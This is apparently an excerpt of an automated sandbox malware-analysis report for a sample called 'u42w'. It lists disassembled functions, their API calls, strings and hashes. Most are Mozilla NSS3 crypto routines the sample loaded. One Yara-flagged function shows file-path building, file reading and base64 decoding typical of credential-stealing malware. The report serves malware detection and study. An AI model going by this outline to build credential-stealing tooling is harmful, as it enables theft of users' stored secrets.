PL_FinishArenaPool.NSS3 ref: 6C9CAF16

Strings

security, xrefs: 6C9CADEE

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 7d11d7468e030135801be352ffd66f595c4ff2576f9e6c2e9881b82e841e7b4f
Instruction ID: 1e7f1ebb469bc3d4f495db4ae0099a44ff26f6ec9ecbb9fcda9774b98926a25c
Opcode Fuzzy Hash: 7d11d7468e030135801be352ffd66f595c4ff2576f9e6c2e9881b82e841e7b4f
Instruction Fuzzy Hash: 31412AB1A0420467E7215B28EC49BAB32BCAFA231CF540525E814A7F81FF35E558C7E7

Uniqueness

Uniqueness Score: -1.00%

Function 6C99EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C99EE0B

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C99EEE1

Part of subcall function 6C991D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C991D7E
Part of subcall function 6C991D50: EnterCriticalSection.KERNEL32(?), ref: 6C991D8E
Part of subcall function 6C991D50: PR_Unlock.NSS3(?), ref: 6C991DD3

TlsGetValue.KERNEL32 ref: 6C99EE51
EnterCriticalSection.KERNEL32(?), ref: 6C99EE65
PR_Unlock.NSS3(?), ref: 6C99EEA2
free.MOZGLUE(?), ref: 6C99EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C99EED0
PR_Unlock.NSS3(?), ref: 6C99EF48
free.MOZGLUE(?), ref: 6C99EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C99EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C99EFA4
free.MOZGLUE(?), ref: 6C99EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C99F055
free.MOZGLUE(?), ref: 6C99F060

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: dfcf6da8a4538c27b2adeb199e92cd7c2c04a0b11932161dd02beba80566058e
Instruction ID: fedea39b226a896bf16f6ac8b5f63f092725b8982d94c2c497f905b07f098e56
Opcode Fuzzy Hash: dfcf6da8a4538c27b2adeb199e92cd7c2c04a0b11932161dd02beba80566058e
Instruction Fuzzy Hash: C88171B1E00209ABDF00DFA5DC45BEE7BB9BF19318F184024E919A3711E731E965CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C964CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C964D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C964D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C964DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C964E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C964E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C964E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C964E85
DER_Encode_Util.NSS3(?,?,6CAB05A4,00000000), ref: 6C964EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C964F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C964F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C964F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C964F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C964F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C964FC8

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 415cd6fe3def5b906f1b11ef54dd2a089a37d97651f99e94f89cb4620f7f9313
Instruction ID: a73d04e04b5dc849307e8ba9501756e848afbdc70a07fabf012f861b0a8e1a66
Opcode Fuzzy Hash: 415cd6fe3def5b906f1b11ef54dd2a089a37d97651f99e94f89cb4620f7f9313
Instruction Fuzzy Hash: 1E81C271908301AFF701CFA6D850B5BB7E8AB94748F14892DF958DBA80E731E915CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C960470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C9604B7

Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C960539

Part of subcall function 6C9B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B1228
Part of subcall function 6C9B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C9B1238
Part of subcall function 6C9B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B124B
Part of subcall function 6C9B1200: PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B125D
Part of subcall function 6C9B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C9B126F
Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C9B1280
Part of subcall function 6C9B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C9B128E
Part of subcall function 6C9B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C9B129A
Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9B12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C96054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C96056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9605CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C9605EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C9605FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C960621
PR_EnterMonitor.NSS3 ref: 6C96063E
PR_ExitMonitor.NSS3 ref: 6C960668
CERT_DestroyCertificate.NSS3(?), ref: 6C960697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9606AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9606CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9606DA

Part of subcall function 6C95E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C9604DC,?,?), ref: 6C95E6C9
Part of subcall function 6C95E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C9604DC,?,?), ref: 6C95E6D9
Part of subcall function 6C95E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C9604DC,?,?), ref: 6C95E6F4
Part of subcall function 6C95E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C9604DC,?), ref: 6C95E703
Part of subcall function 6C95E6B0: CERT_FindCertIssuer.NSS3(?,?,6C9604DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C95E71E

Part of subcall function 6C95F660: PR_EnterMonitor.NSS3(6C96050F,?,00000001,?,?,?), ref: 6C95F6A8
Part of subcall function 6C95F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C95F6C1
Part of subcall function 6C95F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C95F7C8

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: b1714d029c350b7a8df7d9c3b6c73e93413f763c7d20ef800a3ff66992aabd87
Instruction ID: ab12487f0ae228a35a285f4e19ab02ab86716aa21ad4b745a89de8fd26f0c16b
Opcode Fuzzy Hash: b1714d029c350b7a8df7d9c3b6c73e93413f763c7d20ef800a3ff66992aabd87
Instruction Fuzzy Hash: F061F671A043829FFB10CE26CC80B5B77E8AF94358F104629F95997BD1E730E918CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6C9825C0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6C9825DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C98262A

Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60BAB
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60BBA
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C98260F

Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60B88
Part of subcall function 6CA609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA60C5D
Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CA60C8D
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60C9C
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60CD1
Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60CEC
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60CFB
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60D16
Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CA60D26
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D35
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CA60D65
Part of subcall function 6CA609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CA60D70
Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60D90
Part of subcall function 6CA609D0: free.MOZGLUE(00000000), ref: 6CA60D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C9825F6

Part of subcall function 6CA609D0: PR_Now.NSS3 ref: 6CA60A22
Part of subcall function 6CA609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA60A35
Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA60A66
Part of subcall function 6CA609D0: PR_GetCurrentThread.NSS3 ref: 6CA60A70
Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA60A9D
Part of subcall function 6CA609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA60AC8
Part of subcall function 6CA609D0: PR_vsmprintf.NSS3(?,?), ref: 6CA60AE8
Part of subcall function 6CA609D0: EnterCriticalSection.KERNEL32(?), ref: 6CA60B19
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60B48
Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60C76
Part of subcall function 6CA609D0: PR_LogFlush.NSS3 ref: 6CA60C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C982699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C9826C5

Strings

C_GetSlotList, xrefs: 6C9825D8
tokenPresent = 0x%x, xrefs: 6C9825F1
pulCount = 0x%p, xrefs: 6C982625
slotID[%d] = %x, xrefs: 6C9826C0
*pulCount = 0x%x, xrefs: 6C982694
pSlotList = 0x%p, xrefs: 6C98260A

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList
API String ID: 2625801553-2918917633
Opcode ID: aec554f7fc81280450746c73557554882f4daa4329400b0c3641d169654a490d
Instruction ID: 1d142deaec2ef87f3eb14cfb3d16f802d98599fb012bfcef4ec2c459a914a1c6
Opcode Fuzzy Hash: aec554f7fc81280450746c73557554882f4daa4329400b0c3641d169654a490d
Instruction Fuzzy Hash: C2310871202646AFDB04CF54ED8CA457BB5FB6230DF04886BE80597A22DB30DC99CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6C996C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C99781D,00000000,6C98BE2C,?,6C996B1D,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C99781D,?,6C98BE2C,?), ref: 6C996C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C996C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C996C96

Part of subcall function 6C941240: TlsGetValue.KERNEL32(00000040,?,6C94116C,NSPR_LOG_MODULES), ref: 6C941267
Part of subcall function 6C941240: EnterCriticalSection.KERNEL32(?,?,?,6C94116C,NSPR_LOG_MODULES), ref: 6C94127C
Part of subcall function 6C941240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C94116C,NSPR_LOG_MODULES), ref: 6C941291
Part of subcall function 6C941240: PR_Unlock.NSS3(?,?,?,?,6C94116C,NSPR_LOG_MODULES), ref: 6C9412A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C996CAA

Strings

rdb:, xrefs: 6C996C69
extern:, xrefs: 6C996C7E
dbm:, xrefs: 6C996C3A
dbm, xrefs: 6C996CA4
sql:, xrefs: 6C996C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C996C91

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: d5f81ebdcb74926af5668f1d6168cf34669acf5e380420da4b20a9c23b8019c9
Instruction ID: 41e3c52ad140fb30acdcfcaec5aa3e71895bfad722a696111099c4767c15c300
Opcode Fuzzy Hash: d5f81ebdcb74926af5668f1d6168cf34669acf5e380420da4b20a9c23b8019c9
Instruction Fuzzy Hash: 5101A2A17023022BFB5027B96D4AF66259CAF8115CF1C8431FF04E0982FB92E515C0F5

Uniqueness

Uniqueness Score: -1.00%

Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411F4E
memset.MSVCRT ref: 00411F65

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00411F9C
lstrcat.KERNEL32(?,02F65680), ref: 00411FBB
lstrcat.KERNEL32(?,?), ref: 00411FCF
lstrcat.KERNEL32(?,02F65398), ref: 00411FE3

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,02F65758), ref: 0040971B
Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3

StrStrA.SHLWAPI(?,02F66678), ref: 0041209D
GlobalFree.KERNEL32(?), ref: 00412199

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0041212A
StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
lstrcat.KERNEL32(00000000,00000000), ref: 00412159
lstrcat.KERNEL32(00000000,?), ref: 0041216C
lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: 35ff916f43800d44740750d6f16ca7d506e8e9b4bced9b61d5cf2e6d64bf0eaf
Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
Opcode Fuzzy Hash: 35ff916f43800d44740750d6f16ca7d506e8e9b4bced9b61d5cf2e6d64bf0eaf
Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6C94ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C94ACE2
malloc.MOZGLUE(00000001), ref: 6C94ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C94AD02
TlsGetValue.KERNEL32 ref: 6C94AD3C
calloc.MOZGLUE(00000001,?), ref: 6C94AD8C
PR_Unlock.NSS3 ref: 6C94ADC0
free.MOZGLUE(00000000), ref: 6C94AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C94AE58
free.MOZGLUE(00000000), ref: 6C94AE69
free.MOZGLUE(?), ref: 6C94AE78
PR_Unlock.NSS3 ref: 6C94AE8C
free.MOZGLUE(?), ref: 6C94AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C94AEC7

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: e28c42d2717c5dd7c31d37d476d9735daf205766fa1040fd4ad8dbe7f6c94b25
Instruction ID: 1151034fbf6f3a011a49ec7a2aa317537ebeeb7ab214b20d16c8a5c4f242ea0b
Opcode Fuzzy Hash: e28c42d2717c5dd7c31d37d476d9735daf205766fa1040fd4ad8dbe7f6c94b25
Instruction Fuzzy Hash: A951CEB1A002178BEB00DF98DC40AAF77B8AB16348F14C135D914A3B10EB32E916CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6C98ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C98ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C98AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C98AE29

Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963

PR_LogPrint.NSS3(?,00000000), ref: 6C98AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C98AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C98AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C98AEA0

Strings

hKey = 0x%x, xrefs: 6C98AE62, 6C98AE72
hSession = 0x%x, xrefs: 6C98AE01, 6C98AE11
(CK_INVALID_HANDLE), xrefs: 6C98AE1F, 6C98AE80
C_MessageSignInit, xrefs: 6C98ADE1

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
